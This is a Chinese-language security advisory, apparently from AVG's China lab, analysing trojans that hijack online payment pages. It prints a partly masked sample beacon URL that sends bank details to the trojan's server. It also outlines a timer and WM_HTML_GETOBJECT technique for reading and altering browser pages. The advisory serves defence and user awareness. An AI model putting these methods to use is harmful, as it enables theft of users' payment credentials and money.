歲末將至，一年一度的促銷狂潮也陸續(xù)到來，各大網(wǎng)購網(wǎng)站施展渾身解數(shù)來吸引客戶。據(jù)最新數(shù)據(jù)顯示：僅國內(nèi)著名的網(wǎng)購平臺淘寶在12月12日推出的全民瘋搶活動，一個小時內(nèi)，成交額就達到了4.75億，成交量278萬筆。令人眼花繚亂的促銷手段吸引來的不僅是諸多的網(wǎng)購達人，更吸引了眾多黑客的目光。在最近一段時間內(nèi)，AVG中國病毒實驗室截獲大量針對國內(nèi)各種支付平臺的病毒，包括：百聯(lián)，盛付通，快錢，訊付，易寶，支付寶等。同時針對的范圍也有所擴大，除了網(wǎng)購網(wǎng)站之外，一些游戲公司的充值網(wǎng)站也在此類木馬的攻擊范圍之列，如：完美，多玩，4399網(wǎng)絡(luò)游戲，征途游戲等。此類木馬大多是由某種生成器生成，并且木馬的作者提供后臺的管理系統(tǒng)。

此類病毒的傳播手段沒有很明顯的變化，大多還是利用社會工程學(xué)偽裝成word文檔，圖片文件，或者文本文件，誘導(dǎo)用戶點擊。對于攻擊的手段主要有竊取用戶的支付賬戶的密碼，修改用戶的支付賬戶。下面讓我們來近距離來接觸此類木馬，揭開它的神秘面紗。

目前截獲的一些樣本中大多數(shù)具有word文檔的圖標(biāo)。這類文件可能是以郵件附件的形式存在，也有可能是賣家發(fā)送產(chǎn)品信息。在運行過程中此類木馬會首先連接到baidu，以確定當(dāng)前的網(wǎng)絡(luò)狀況。然后連接到病毒后臺的服務(wù)器。發(fā)出的請求的形式如下：

http://119.***.***.48:858/Api/163/Post.Php?UserName=aucodehu&Bank=ICBC&Money=88（鏈接已經(jīng)處理）

通過以上用戶名以及銀行信息，可以進行管理和分贓。隨后木馬會簡單的收集一下系統(tǒng)的信息然后發(fā)送到相同的后臺系統(tǒng)。

包括本機的ip,操作系統(tǒng)版本，以及地理位置。

在進行完以上的準(zhǔn)備活動后，此木馬就開始監(jiān)控用戶的所瀏覽的網(wǎng)址，區(qū)別于以往的代碼注入，或者劫持API之類的手法，此類木馬使用了一種更為簡便而且行之有效的方法：定時器。而這種手段可能被某些主動防御所忽略。此類木馬一般設(shè)置了三個或以上的定時器。觸發(fā)的時間間隔是200毫秒。這個時間間隔足以監(jiān)控到用戶對網(wǎng)站的操作。其中一個定時器，會通過GetCursorPos獲得當(dāng)前鼠標(biāo)的位置，進而獲得當(dāng)前窗口的句柄。然后通過向Webbrowser控件(窗口類名是"Internet Explorer_Server")發(fā)一個WM_HTML_GETOBJECT的消息獲得IHTMLDocument對象。獲得此對象后，木馬作者就可以對該頁面進行任何操作：解析該頁面元素，竊取自己感興趣的任何內(nèi)容，篡改支付信息等等，以下是在病毒中截取到的一個字符串的片段：

同時也會在頁面中添加一些屬性為隱藏的標(biāo)簽，這些標(biāo)簽是不會顯示在頁面中，但是卻是真正起作用的部分：

一旦點擊提交，這些頁面中隱藏的內(nèi)容將被提交，用戶就會面臨著信息失竊，財產(chǎn)損失。同時病毒還設(shè)置其它的定時器。用來關(guān)閉支付網(wǎng)站對用戶環(huán)境檢查的以及用戶支付失敗的頁面。

對于此類木馬的防范，應(yīng)該注意以下幾點：

1.保持殺毒軟件的及時更新。

2.不打開任何不是自己主動索取的文件。

3.檢查文件的類型是否和圖標(biāo)以及后綴一致。

4.網(wǎng)購時如果發(fā)現(xiàn)任何用戶支付環(huán)境檢查的頁面被關(guān)閉，立即停止支付。

5.檢查支付頁面是否被修改。

AVG已經(jīng)可以檢測此類病毒，用戶們只要不關(guān)閉更新，保持病毒庫在當(dāng)前最新狀態(tài)，就可以有效阻止該木馬的侵襲。同時，AVG中國實驗室借此提醒廣大網(wǎng)友，年底是各種網(wǎng)絡(luò)病毒爆發(fā)的高危期，平時網(wǎng)上沖浪特別是涉及財產(chǎn)交易時一定要謹慎再謹慎。